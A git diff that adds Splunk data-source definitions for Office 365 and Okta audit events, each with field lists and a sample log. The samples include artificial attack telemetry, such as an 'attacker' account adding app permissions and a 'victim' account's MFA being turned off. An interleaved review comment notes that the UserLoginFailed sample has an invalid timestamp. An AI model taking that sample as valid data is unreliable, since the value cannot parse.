diff --git a/data_sources/o365_set_company_information_.yml b/data_sources/o365_set_company_information_.yml
new file mode 100644
index 0000000000..534cc52f87
--- /dev/null
+++ b/data_sources/o365_set_company_information_.yml
@@ -0,0 +1,115 @@
+name: O365 Set Company Information.
+id: 06c6d576-f032-41e3-b15d-80a434ce13d8
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Set Company Information.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- ClientIP
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- extended_properties
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"Actor": [{"ID": "bpatel@rodsoto.onmicrosoft.com", "Type": 5}, {"ID":
+ "100320010208B5DC", "Type": 3}, {"ID": "User_425b75db-38be-4c7b-a474-5f0709247370",
+ "Type": 2}, {"ID": "425b75db-38be-4c7b-a474-5f0709247370", "Type": 2}, {"ID": "User",
+ "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress":
+ "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2021-01-13T22:57:21",
+ "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory",
+ "Value": "Company"}], "Id": "50a62783-f9d7-472c-9e44-f4f3d346e53c", "InterSystemsId":
+ "6f435e84-e95b-44da-820f-2d2c9c237293", "IntraSystemId": "1163f0db-2241-4689-8486-b15c7812bbe0",
+ "ModifiedProperties": [{"Name": "StrongAuthenticationPolicy", "NewValue": "[\r\n {\r\n \"RelyingPartyStrongAuthenticationPolicies\":
+ [\r\n {\r\n \"RelyingParties\": [\r\n \"*\"\r\n ],\r\n \"Rules\":
+ [\r\n {\r\n \"SelectionConditions\": [\r\n {\r\n \"Claim\":
+ 1,\r\n \"Operator\": 0,\r\n \"Values\": [\r\n \"73.15.72.101/32\",\r\n \"66.176.252.11/32\"\r\n ]\r\n }\r\n ]\r\n }\r\n ],\r\n \"Enabled\":
+ true\r\n }\r\n ]\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"RelyingPartyStrongAuthenticationPolicies\":
+ [\r\n {\r\n \"RelyingParties\": [\r\n \"*\"\r\n ],\r\n \"Rules\":
+ [\r\n {\r\n \"SelectionConditions\": [\r\n {\r\n \"Claim\":
+ 1,\r\n \"Operator\": 0,\r\n \"Values\": [\r\n \"73.15.72.101/32\",\r\n \"66.176.252.11/32\"\r\n ]\r\n }\r\n ]\r\n },\r\n {\r\n \"SelectionConditions\":
+ [\r\n {\r\n \"Claim\": 2,\r\n \"Operator\":
+ 0,\r\n \"Values\": [\r\n \"insidecorporatenetwork--true\"\r\n ]\r\n }\r\n ]\r\n }\r\n ],\r\n \"Enabled\":
+ true\r\n }\r\n ]\r\n }\r\n]"}, {"Name": "Included Updated Properties",
+ "NewValue": "StrongAuthenticationPolicy", "OldValue": ""}], "ObjectId": "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "Operation": "Set Company Information.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID":
+ "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Type": 2}, {"ID": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "Type": 2}, {"ID": "Directory", "Type": 2}, {"ID": "Emergency Information Technology
+ Services LLC", "Type": 1}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "UserId": "bpatel@rodsoto.onmicrosoft.com", "UserKey": "100320010208B5DC@rodsoto.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
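Review bot: The trailing period in `name: O365 Set Company Information.` (and in `description:`) looks like a typo but is evidently deliberate, since `separator: Operation` and the sample's `"Operation": "Set Company Information."` carry the same period; a comment on the `name:` line such as `# trailing period is intentional: matches the raw Operation value used as separator` would stop a future cleanup from silently breaking the match. The same applies to o365_update_application_.yml, o365_update_authorization_policy_.yml and o365_update_user_.yml. Separately, the sample policy in `example_log` embeds routable addresses (`73.15.72.101/32`, `66.176.252.11/32`); if these were not deliberately scrubbed, documentation ranges (RFC 5737) are the safer choice for a published sample.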
diff --git a/data_sources/o365_set_mailbox.yml b/data_sources/o365_set_mailbox.yml
new file mode 100644
index 0000000000..7ae4d85964
--- /dev/null
+++ b/data_sources/o365_set_mailbox.yml
@@ -0,0 +1,92 @@
+name: O365 Set-Mailbox
+id: db798c5c-928c-4972-bb42-e5f90e35865f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Set-Mailbox
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- AppId
+- ClientAppId
+- ClientIP
+- CreationTime
+- ExternalAccess
+- Id
+- Identity
+- ObjectId
+- Operation
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- Parameters{}.Name
+- Parameters{}.Value
+- Params
+- RecordType
+- ResultStatus
+- SessionId
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- eventtype
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_id
+- punct
+- record_type
+- result
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- src_user_type
+- status
+- tag
+- tag::eventtype
+- tenant_id
+- timeendpos
+- timestartpos
+- user
+- user_id
+- vendor_account
+- vendor_product
+example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.192.200.190:52816",
+ "CreationTime": "2020-12-16T12:32:28", "ExternalAccess": false, "Id": "a6a52406-0912-448d-36eb-08d8a1bea6be",
+ "ObjectId": "bpatel", "Operation": "Set-Mailbox", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341
+ (15.20.3654.025)", "Parameters": [{"Name": "ForwardingAddress", "Value": ""}, {"Name":
+ "Identity", "Value": "bpatel@rodsoto.onmicrosoft.com"}], "RecordType": 1, "ResultStatus":
+ "True", "SessionId": "86a7cd7c-3f42-4b68-b670-4024b5461a80", "UserId": "pbareiss@rodsoto.onmicrosoft.com",
+ "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
diff --git a/data_sources/o365_update_application_.yml b/data_sources/o365_update_application_.yml
new file mode 100644
index 0000000000..bd21101d66
--- /dev/null
+++ b/data_sources/o365_update_application_.yml
@@ -0,0 +1,116 @@
+name: O365 Update application.
+id: 62159133-911b-4c63-9e30-a6a8c89195ca
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Update application.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-01T17:16:20", "Id": "c428c85c-4fa0-4e97-9033-6a76d9dee45d",
+ "Operation": "Update application.", "OrganizationId": "58aee3b9-7433-46a0-b54e-2429487992a0",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f",
+ "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1,
+ "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+ (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0
+ Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name":
+ "extendedAuditEventCategory", "Value": "Application"}], "ModifiedProperties": [{"Name":
+ "RequiredResourceAccess", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\":
+ [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\":
+ false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n },\r\n {\r\n \"EntitlementId\":
+ \"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\":
+ []\r\n },\r\n {\r\n \"EntitlementId\": \"b633e1c5-b582-4048-a93e-9f11b44c7e96\",\r\n \"DirectAccessGrant\":
+ true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\":
+ 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\":
+ [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\":
+ false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\":
+ 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "RequiredResourceAccess",
+ "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5},
+ {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
+ "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID":
+ "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}],
+ "ActorContextId": "58aee3b9-7433-46a0-b54e-2429487992a0", "InterSystemsId": "6a0bc9d4-eb2d-4eb0-a524-601dac6914a6",
+ "IntraSystemId": "a2d4d7c4-727c-401b-9e6c-70413a080855", "SupportTicketId": "",
+ "Target": [{"ID": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2},
+ {"ID": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2}, {"ID": "Application",
+ "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454",
+ "Type": 2}], "TargetContextId": "58aee3b9-7433-46a0-b54e-2429487992a0"}'
diff --git a/data_sources/o365_update_authorization_policy_.yml b/data_sources/o365_update_authorization_policy_.yml
new file mode 100644
index 0000000000..2257421d06
--- /dev/null
+++ b/data_sources/o365_update_authorization_policy_.yml
@@ -0,0 +1,99 @@
+name: O365 Update authorization policy.
+id: d40e6a20-4d64-404c-8351-2caae8228d34
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Update authorization policy.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-26T19:22:20", "Id": "83774e72-313f-4d1f-8609-7d0c7bb3b4ff",
+ "Operation": "Update authorization policy.", "OrganizationId": "a417c578-c7ee-480d-a225-d48057e74df5",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678",
+ "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+ 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Swagger-Codegen/1.0.0.0/csharp/msal\"}"},
+ {"Name": "extendedAuditEventCategory", "Value": "AuthorizationPolicy"}], "ModifiedProperties":
+ [{"Name": "AllowUserConsentForRiskyApps", "NewValue": "[\r\n true\r\n]", "OldValue":
+ "[\r\n false\r\n]"}, {"Name": "PermissionGrantPolicyIdsAssignedToDefaultUserRole",
+ "NewValue": "[\r\n \"microsoft-user-default-legacy\"\r\n]", "OldValue": "[\r\n \"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"\r\n]"},
+ {"Name": "Included Updated Properties", "NewValue": "AllowUserConsentForRiskyApps,
+ PermissionGrantPolicyIdsAssignedToDefaultUserRole", "OldValue": ""}], "Actor": [{"ID":
+ "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E",
+ "Type": 3}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID":
+ "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}],
+ "ActorContextId": "a417c578-c7ee-480d-a225-d48057e74df5", "InterSystemsId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065",
+ "IntraSystemId": "92a0d051-2d0d-4608-9d09-6fca619764a2", "SupportTicketId": "",
+ "Target": [{"ID": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678", "Type":
+ 2}, {"ID": "24484114-1daa-4700-aaf7-44ee5cbe5678", "Type": 2}, {"ID": "Other", "Type":
+ 2}, {"ID": "Authorization Policy", "Type": 1}], "TargetContextId": "a417c578-c7ee-480d-a225-d48057e74df5"}'
diff --git a/data_sources/o365_update_user_.yml b/data_sources/o365_update_user_.yml
new file mode 100644
index 0000000000..f651738fb1
--- /dev/null
+++ b/data_sources/o365_update_user_.yml
@@ -0,0 +1,113 @@
+name: O365 Update user.
+id: a05fd01e-34d9-4233-9089-11272416b531
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Update user.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-20T19:32:59", "Id": "d06df1c6-b3f2-4595-90b9-99b8f91811c3",
+ "Operation": "Update user.", "OrganizationId": "99825d50-9544-4061-8e46-68923805cbf2",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "10032002CC029AE9@splunkresearch1.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victim@splunkresearch1.onmicrosoft.com",
+ "UserId": "victim@splunkresearch1.onmicrosoft.com", "AzureActiveDirectoryEventType":
+ 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"UserType\":\"Member\"}"},
+ {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties":
+ [{"Name": "StrongAuthenticationMethod", "NewValue": "[\r\n {\r\n \"MethodType\":
+ 7,\r\n \"Default\": false\r\n },\r\n {\r\n \"MethodType\": 6,\r\n \"Default\":
+ true\r\n },\r\n {\r\n \"MethodType\": 0,\r\n \"Default\": false\r\n },\r\n {\r\n \"MethodType\":
+ 5,\r\n \"Default\": false\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"MethodType\":
+ 6,\r\n \"Default\": true\r\n },\r\n {\r\n \"MethodType\": 7,\r\n \"Default\":
+ false\r\n }\r\n]"}, {"Name": "StrongAuthenticationRequirement", "NewValue": "[\r\n {\r\n \"RelyingParty\":
+ \"*\",\r\n \"State\": 0,\r\n \"RememberDevicesNotIssuedBefore\": \"2023-10-19T16:11:43+00:00\"\r\n }\r\n]",
+ "OldValue": "[\r\n {\r\n \"RelyingParty\": \"*\",\r\n \"State\": 1,\r\n \"RememberDevicesNotIssuedBefore\":
+ \"2023-10-19T16:11:43+00:00\"\r\n }\r\n]"}, {"Name": "Included Updated Properties",
+ "NewValue": "StrongAuthenticationMethod, StrongAuthenticationRequirement", "OldValue":
+ ""}, {"Name": "TargetId.UserType", "NewValue": "Member", "OldValue": ""}], "Actor":
+ [{"ID": "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9",
+ "Type": 3}, {"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID":
+ "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}],
+ "ActorContextId": "99825d50-9544-4061-8e46-68923805cbf2", "InterSystemsId": "533a45c6-4f9a-4527-ad8d-e8fec5c7d8e4",
+ "IntraSystemId": "32734207-053e-4ad1-87a3-4da1dfa69c58", "SupportTicketId": "",
+ "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID":
+ "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID":
+ "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9",
+ "Type": 3}], "TargetContextId": "99825d50-9544-4061-8e46-68923805cbf2"}'
diff --git a/data_sources/o365_userloggedin.yml b/data_sources/o365_userloggedin.yml
new file mode 100644
index 0000000000..2e246cf766
--- /dev/null
+++ b/data_sources/o365_userloggedin.yml
@@ -0,0 +1,103 @@
+name: O365 UserLoggedIn
+id: ed29c8c4-4053-419c-b133-16abf2a1c4c9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 UserLoggedIn
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- ApplicationId
+- AzureActiveDirectoryEventType
+- BrowserType
+- ClientIP
+- CreationTime
+- DeviceProperties{}.Name
+- DeviceProperties{}.Value
+- ErrorNumber
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- OS
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- RequestType
+- ResultStatus
+- ResultStatusDetail
+- SessionId
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserAgent
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-12-04T20:42:05", "Id": "52d72a62-132b-487b-bb7f-c4c119f90700",
+ "Operation": "UserLoggedIn", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+ "RecordType": 15, "ResultStatus": "Success", "UserKey": "2d2f9e2c-8350-4d98-852e-3f06daaf7185",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "54.68.231.63",
+ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "UserId": "user15@splunkresearch.onmicrosoft.com",
+ "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "ResultStatusDetail",
+ "Value": "Success"}, {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0;
+ Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}, {"Name": "RequestType", "Value":
+ "OAuth2:Authorize"}], "ModifiedProperties": [], "Actor": [{"ID": "2d2f9e2c-8350-4d98-852e-3f06daaf7185",
+ "Type": 0}, {"ID": "user15@splunkresearch.onmicrosoft.com", "Type": 5}], "ActorContextId":
+ "75243ab2-44f8-435c-a7a6-b479385df6d4", "ActorIpAddress": "54.68.231.63", "InterSystemsId":
+ "6463a6ad-27ec-b311-dc52-ecdde38d9492", "IntraSystemId": "52d72a62-132b-487b-bb7f-c4c119f90700",
+ "SupportTicketId": "", "Target": [{"ID": "00000002-0000-0ff1-ce00-000000000000",
+ "Type": 0}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "ApplicationId":
+ "00000002-0000-0ff1-ce00-000000000000", "DeviceProperties": [{"Name": "OS", "Value":
+ "Windows10"}, {"Name": "BrowserType", "Value": "Firefox"}, {"Name": "SessionId",
+ "Value": "15e27956-79a0-45b2-9d02-60f48349f692"}], "ErrorNumber": "0"}'
diff --git a/data_sources/o365_userloginfailed.yml b/data_sources/o365_userloginfailed.yml
new file mode 100644
index 0000000000..c9cab2bd17
--- /dev/null
+++ b/data_sources/o365_userloginfailed.yml
@@ -0,0 +1,113 @@
+name: O365 UserLoginFailed
+id: 6099b33d-d581-43ed-8401-911862590361
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 UserLoginFailed
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- ApplicationId
+- AzureActiveDirectoryEventType
+- BrowserType
+- ClientIP
+- CreationTime
+- DeviceProperties{}.Name
+- DeviceProperties{}.Value
+- ErrorNumber
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- IsCompliantAndManaged
+- LogonError
+- OS
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- RequestType
+- ResultStatus
+- ResultStatusDetail
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserAgent
+- UserAuthenticationMethod
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- app
+- authentication_method
+- authentication_service
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- host
+- index
+- linecount
+- object
+- punct
+- reason
+- record_type
+- result
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- tag
+- tag::action
+- tag::eventtype
+- user
+- user_agent
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-10T17:08:65", "Id": "4593aac8-855f-4341-9d2a-4289146eb800",
+ "Operation": "UserLoginFailed", "OrganizationId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc",
+ "RecordType": 15, "ResultStatus": "Failed", "UserKey": "57e4bd36-9722-4a4a-9729-7203d8e00b72",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "52.3.21.4",
+ "ObjectId": "Unknown", "UserId": "user30@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType":
+ 1, "ExtendedProperties": [{"Name": "ResultStatusDetail", "Value": "UserError"},
+ {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+ (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"}, {"Name": "UserAuthenticationMethod",
+ "Value": "1"}, {"Name": "RequestType", "Value": "OAuth2:Token"}], "ModifiedProperties":
+ [], "Actor": [{"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 0}, {"ID":
+ "user30@contoso.onmicrosoft.com", "Type": 5}], "ActorContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc",
+ "ActorIpAddress": "52.3.21.4", "InterSystemsId": "97e59adc-b4be-4ea6-8f17-b46677242190",
+ "IntraSystemId": "eeeba3a0-c619-437a-9879-3dd009f9bf00", "SupportTicketId": "",
+ "Target": [{"ID": "Unknown", "Type": 0}], "TargetContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc",
+ "ApplicationId": "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223", "DeviceProperties": [{"Name":
+ "OS", "Value": "Windows10"}, {"Name": "BrowserType", "Value": "Chrome"}, {"Name":
+ "IsCompliantAndManaged", "Value": "False"}], "ErrorNumber": "50126", "LogonError":
+ "InvalidUserNameOrPassword"}'
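Review bot: The sample event's timestamp `"CreationTime": "2023-10-10T17:08:65"` is not a valid time (seconds run 00–59), so any consumer that parses `CreationTime` strictly — for example to derive `_time` — will reject or mis-date this event. Correcting the seconds field to a valid value, e.g. `"CreationTime": "2023-10-10T17:08:05"` (illustrative), keeps the sample usable for replay and testing. The rest of the record (`ErrorNumber`, `LogonError`, `RecordType` 15) is consistent with a failed-login event.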
diff --git a/data_sources/okta.yml b/data_sources/okta.yml
new file mode 100644
index 0000000000..312dcdad22
--- /dev/null
+++ b/data_sources/okta.yml
@@ -0,0 +1,12 @@
+name: Okta
+id: ec26febe-e760-4981-bbee-72e107c7b9d2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Okta
+source: Okta
+sourcetype: OktaIM2:log
